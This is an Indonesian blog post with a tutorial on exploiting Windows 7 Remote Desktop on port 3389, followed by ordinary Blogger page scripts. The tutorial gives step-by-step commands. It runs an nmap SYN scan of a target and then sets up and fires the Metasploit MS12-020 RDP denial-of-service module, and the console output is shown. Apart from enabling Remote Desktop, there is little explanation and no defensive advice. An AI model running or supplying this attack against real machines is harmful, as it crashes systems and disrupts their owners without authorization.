Maaf, situs ini tidak berfungsi dengan baik tanpa JavaScript.

Exploitasi BUG for Windows 7 Port: 3389

Oleh chmood

Januari 30, 2016

Persiapan pada Windows 7:

Sebelum melakukan pengujian port 3389 pada windows 7 ada beberapa langkah yang perlu dipersiapkan, yaitu: mengaktifkan system Remote pada windows 7.

Klik Logo Windows klik kanan pada computer pilih Properties

Pilih pada sebelah kiri Remote Setting kemudian akan muncul pop up dan pilih tab menu remote lalu centang yang tengah pada Remote Desktop dan pilih Apply OK.

Selanjutnya pada BackTrack lakukan langkah berikut:

root@bt:~# nmap -sS -v -o [Ip Target]
Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-17 12:44 WIT
Nmap scan report for
Host is up (0.00038s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE
443/tcp open https
465/tcp open smtps
563/tcp open snews
636/tcp open ldapssl
992/tcp open telnets
993/tcp open imaps
995/tcp open pop3s
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
9000/tcp open cslistener
MAC Address: 54:04:A6:4B:75:E0 (Asustek Computer)
Nmap done: 1 IP address (1 host up) scanned in 9.67 seconds

root@bt:~# msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rport 3389
rport => 3389
msf auxiliary(ms12_020_maxchannelids) > set rhost [Ip Target]
rhost => 192.168.77.108
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 000.000.00.000 yes The target address
RPORT 3389 yes The target port

msf auxiliary(ms12_020_maxchannelids) > exploit

Proses Membuka tools Metasploit lewat terminal dan proses Scanning Port 3389

Proses Exploitasi

Category

Komentar

Postingan Lebih Baru Postingan Lama


<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1633206389-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY7KYAfCg_2mXxZdFozO0vNB5m8YEw:1696339827704';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d6591049221521879804','//www.75n1.net/2016/01/exploitasi-bug-for-windows-7-port-3389.html','6591049221521879804');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '6591049221521879804', 'title': 'T.I Sniper', 'url': 'https://www.75n1.net/2016/01/exploitasi-bug-for-windows-7-port-3389.html', 'canonicalUrl': 'https://www.75n1.net/2016/01/exploitasi-bug-for-windows-7-port-3389.html', 'homepageUrl': 'https://www.75n1.net/', 'searchUrl': 'https://www.75n1.net/search', 'canonicalHomepageUrl': 'https://www.75n1.net/', 'blogspotFaviconUrl': 'https://www.75n1.net/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'G-5BKSEB8T0Z', 'analytics4': true, 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22T.I Sniper - Atom\x22 href\x3d\x22https://www.75n1.net/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22T.I Sniper - RSS\x22 href\x3d\x22https://www.75n1.net/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22T.I Sniper - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/6591049221521879804/posts/default\x22 /\x3e\n\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22T.I Sniper - Atom\x22 href\x3d\x22https://www.75n1.net/feeds/5584956367152567824/comments/default\x22 /\x3e\n', 'meTag': '', 'adsenseClientId': 'ca-pub-6383524082178772', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/59911a2a9e035808', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Bagikan ke Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': true, 'jumpLinkMessage': 'Lihat Selengkapnya', 'pageType': 'item', 'postId': '5584956367152567824', 'postImageThumbnailUrl': 'http://3.bp.blogspot.com/-eT28Cw35rQI/VcslWxcweFI/AAAAAAAABRg/lvdV6PCxr6U/s72-c/11807610_1649195318651250_1107698346739691199_o.jpg', 'postImageUrl': 'http://3.bp.blogspot.com/-eT28Cw35rQI/VcslWxcweFI/AAAAAAAABRg/lvdV6PCxr6U/s320/11807610_1649195318651250_1107698346739691199_o.jpg', 'pageName': 'Exploitasi BUG for Windows 7 Port: 3389 ', 'pageTitle': 'T.I Sniper: Exploitasi BUG for Windows 7 Port: 3389 ', 'metaDescription': ''}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': true, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Exploitasi BUG for Windows 7 Port: 3389 ', 'description': 'T.I Sniper\n#apps #motivasi #sukses #bisnis #bisnisonline #pengusaha #profit #technology #free dollar business every day #digitalexchangeid', 'featuredImage': '//3.bp.blogspot.com/-eT28Cw35rQI/VcslWxcweFI/AAAAAAAABRg/lvdV6PCxr6U/s320/11807610_1649195318651250_1107698346739691199_o.jpg', 'url': 'https://www.75n1.net/2016/01/exploitasi-bug-for-windows-7-port-3389.html', 'type': 'item', 'isSingleItem': true, 'isMultipleItems': false, 'isError': false, 'isPage': false, 'isPost': true, 'isHomepage': false, 'isArchive': false, 'isLabelSearch': false, 'postId': 5584956367152567824}}, {'name': 'widgets', 'data': [{'title': 'JavaScript Variables', 'type': 'LinkList', 'sectionId': 'elcreative_panel_top', 'id': 'LinkList995'}, {'title': 'CSS Options', 'type': 'LinkList', 'sectionId': 'elcreative_panel_top', 'id': 'LinkList996'}, {'title': 'Custom SVG Icons', 'type': 'LinkList', 'sectionId': 'elcreative_panel_top', 'id': 'LinkList998'}, {'title': 'Custom SVG Pack (SVG Sprites)', 'type': 'HTML', 'sectionId': 'elcreative_panel_top', 'id': 'HTML994'}, {'title': 'T.I Sniper (Header)', 'type': 'Header', 'sectionId': 'section_app_bar', 'id': 'Header1'}, {'title': 'Tabbed Menu', 'type': 'PageList', 'sectionId': 'section_tabbed_menu', 'id': 'PageList998'}, {'title': 'Navigation Drawer Menu', 'type': 'LinkList', 'sectionId': 'section_navigation', 'id': 'LinkList999'}, {'title': 'More Menu', 'type': 'PageList', 'sectionId': 'section_navigation', 'id': 'PageList999'}, {'title': 'elcreativeTicker', 'type': 'LinkList', 'sectionId': 'section_main_top_widget', 'id': 'LinkList8'}, {'title': 'elcreativeCarousel', 'type': 'LinkList', 'sectionId': 'section_main_top_widget', 'id': 'LinkList2'}, {'title': 'elcreativeGrid', 'type': 'LinkList', 'sectionId': 'section_main_top_widget', 'id': 'LinkList3'}, {'title': '', 'type': 'HTML', 'sectionId': 'section_main_top_widget', 'id': 'HTML2'}, {'title': 'Post Ad Slot (Top)', 'type': 'HTML', 'sectionId': 'section_main_widget', 'id': 'HTML996'}, {'title': 'Postingan Blog', 'type': 'Blog', 'sectionId': 'section_main_widget', 'id': 'Blog1', 'posts': [{'id': '5584956367152567824', 'title': 'Exploitasi BUG for Windows 7 Port: 3389 ', 'featuredImage': '//3.bp.blogspot.com/-eT28Cw35rQI/VcslWxcweFI/AAAAAAAABRg/lvdV6PCxr6U/s320/11807610_1649195318651250_1107698346739691199_o.jpg', 'showInlineAds': false}], 'footerBylines': [{'regionName': 'footer1', 'items': [{'name': 'author', 'label': 'Oleh'}, {'name': 'timestamp', 'label': ''}, {'name': 'comments', 'label': 'Komentar'}, {'name': 'icons', 'label': ''}, {'name': 'share', 'label': ''}]}, {'regionName': 'footer2', 'items': [{'name': 'labels', 'label': 'Category'}]}], 'allBylineItems': [{'name': 'author', 'label': 'Oleh'}, {'name': 'timestamp', 'label': ''}, {'name': 'comments', 'label': 'Komentar'}, {'name': 'icons', 'label': ''}, {'name': 'share', 'label': ''}, {'name': 'labels', 'label': 'Category'}]}, {'title': 'Between Post Ad Slot', 'type': 'HTML', 'sectionId': 'section_main_widget', 'id': 'HTML995'}, {'title': 'Post Ad Slot (Bottom)', 'type': 'HTML', 'sectionId': 'section_main_widget', 'id': 'HTML997'}, {'title': 'elcreativeBlockHero', 'type': 'LinkList', 'sectionId': 'section_main_bottom_widget', 'id': 'LinkList5'}, {'title': 'elcreativeBlockFooter', 'type': 'LinkList', 'sectionId': 'section_main_bottom_widget', 'id': 'LinkList7'}, {'title': '', 'type': 'HTML', 'sectionId': 'section_main_bottom_widget', 'id': 'HTML1'}, {'title': 'elcreativeSocial', 'type': 'LinkList', 'sectionId': 'section_aside_widget', 'id': 'LinkList1'}, {'title': 'elcreativeComment', 'type': 'LinkList', 'sectionId': 'section_aside_widget', 'id': 'LinkList4'}, {'title': 'Translate', 'type': 'Translate', 'sectionId': 'section_aside_widget', 'id': 'Translate1'}, {'title': 'Terpopuler', 'type': 'PopularPosts', 'sectionId': 'section_aside_widget', 'id': 'PopularPosts1', 'posts': [{'title': 'Cara Dapat Backlink dengan Google Dork', 'id': 4618471647357931247}, {'title': 'Backlink dengan Google Dork Seo', 'id': 1029614712689143656}, {'title': 'Lowongan Pekerjaan PT HM Sampoerna Tbk, Hari Ini Agustus 2023', 'id': 9016015704194938524}, {'title': 'Cara Mentera Ulang Truk Tangki BBM', 'id': 5124167344293466576}, {'title': 'Hacking Jcow Social Networking Webserver', 'id': 6827929768928876843}, {'title': 'Cara Dapat Backlink Edu Gratis', 'id': 1790459385425367288}, {'title': 'SEC ADMIN LOGIN DORK SQL LOGIN', 'id': 1070671081507204118}, {'title': 'DOWNLOAD APP SCRAPEBOX PREMIUM FREE SEO', 'id': 601204630157704678}, {'title': 'Tata-Tata Cara Mendapatkan Penghasilan dari Blog Hingga Ratusan Juta Bahkan Milyaran per Bulan', 'id': 5224251092851979559}, {'title': 'App Baca Buku Pdf, Epub, Word, Mobi, Kindle, Android Tampa Iklan ReadEra', 'id': 4748466111220910011}]}, {'title': 'Custom Vanilla JavaScript', 'type': 'HTML', 'sectionId': 'elcreative_panel_bottom', 'id': 'HTML998'}, {'title': 'Custom jQuery Script', 'type': 'HTML', 'sectionId': 'elcreative_panel_bottom', 'id': 'HTML999'}, {'title': 'Formulir Kontak', 'type': 'ContactForm', 'sectionId': 'hidden', 'id': 'ContactForm1'}]}]);
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList995', 'elcreative_panel_top', document.getElementById('LinkList995'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList996', 'elcreative_panel_top', document.getElementById('LinkList996'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList998', 'elcreative_panel_top', document.getElementById('LinkList998'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML994', 'elcreative_panel_top', document.getElementById('HTML994'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'section_app_bar', document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_PageListView', new _WidgetInfo('PageList998', 'section_tabbed_menu', document.getElementById('PageList998'), {'title': 'Tabbed Menu', 'links': [{'isCurrentPage': false, 'href': 'http://www.75n1.net/', 'title': 'Exit \ud83c\udfc3\u200d\u2642\ufe0f'}, {'isCurrentPage': false, 'href': 'https://www.75n1.net/p/contact-support.html', 'id': '528839158299513358', 'title': 'Any Questions \ud83d\udce7'}, {'isCurrentPage': false, 'href': 'https://www.75n1.net/2021/12/CARA-MEMBUAT-TULISAN-TERBALIK.html', 'title': 'inverted text \ud83d\udcd1'}], 'mobile': false, 'showPlaceholder': false, 'hasCurrentPage': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList999', 'section_navigation', document.getElementById('LinkList999'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_PageListView', new _WidgetInfo('PageList999', 'section_navigation', document.getElementById('PageList999'), {'title': 'More Menu', 'links': [{'isCurrentPage': false, 'href': 'http://www.75n1.net/', 'title': 'Beranda'}, {'isCurrentPage': false, 'href': 'https://www.75n1.net/p/dashboard.html', 'id': '6480565890879288711', 'title': 'Dashboard Login'}, {'isCurrentPage': false, 'href': 'https://www.75n1.net/2016/01/niat-hati.html', 'title': 'Kode Etik'}, {'isCurrentPage': false, 'href': 'https://www.75n1.net/2021/12/CARA-MEMBUAT-TULISAN-TERBALIK.html', 'title': 'inverted text'}, {'isCurrentPage': false, 'href': 'https://www.75n1.net/p/contact-support.html', 'id': '528839158299513358', 'title': 'Contact Support'}], 'mobile': false, 'showPlaceholder': false, 'hasCurrentPage': false}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList8', 'section_main_top_widget', document.getElementById('LinkList8'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList2', 'section_main_top_widget', document.getElementById('LinkList2'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList3', 'section_main_top_widget', document.getElementById('LinkList3'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'section_main_top_widget', document.getElementById('HTML2'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML996', 'section_main_widget', document.getElementById('HTML996'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'section_main_widget', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/3705113668-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3268905543-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML995', 'section_main_widget', document.getElementById('HTML995'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML997', 'section_main_widget', document.getElementById('HTML997'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList5', 'section_main_bottom_widget', document.getElementById('LinkList5'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList7', 'section_main_bottom_widget', document.getElementById('LinkList7'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'section_main_bottom_widget', document.getElementById('HTML1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList1', 'section_aside_widget', document.getElementById('LinkList1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList4', 'section_aside_widget', document.getElementById('LinkList4'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_TranslateView', new _WidgetInfo('Translate1', 'section_aside_widget', document.getElementById('Translate1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'section_aside_widget', document.getElementById('PopularPosts1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML998', 'elcreative_panel_bottom', document.getElementById('HTML998'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML999', 'elcreative_panel_bottom', document.getElementById('HTML999'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_ContactFormView', new _WidgetInfo('ContactForm1', 'hidden', document.getElementById('ContactForm1'), {'contactFormMessageSendingMsg': 'Mengirim...', 'contactFormMessageSentMsg': 'Pesan sudah dikirim.', 'contactFormMessageNotSentMsg': 'Pesan tidak dapat dikirim. Coba lagi nanti.', 'contactFormInvalidEmailMsg': 'Alamat email harus valid.', 'contactFormEmptyMessageMsg': 'Bidang pesan harus diisi.', 'title': 'Formulir Kontak', 'blogId': '6591049221521879804', 'contactFormNameMsg': 'Nama', 'contactFormEmailMsg': 'Email', 'contactFormMessageMsg': 'Pesan', 'contactFormSendMsg': 'Kirim', 'contactFormToken': 'AOuZoY5MHe8eKLMPKEQ1Vsnh7UbVOUvHRg:1696339827705', 'submitUrl': 'https://www.blogger.com/contact-form.do'}, 'displayModeFull'));
</script>
</body>
  <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WF7BMJJ"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->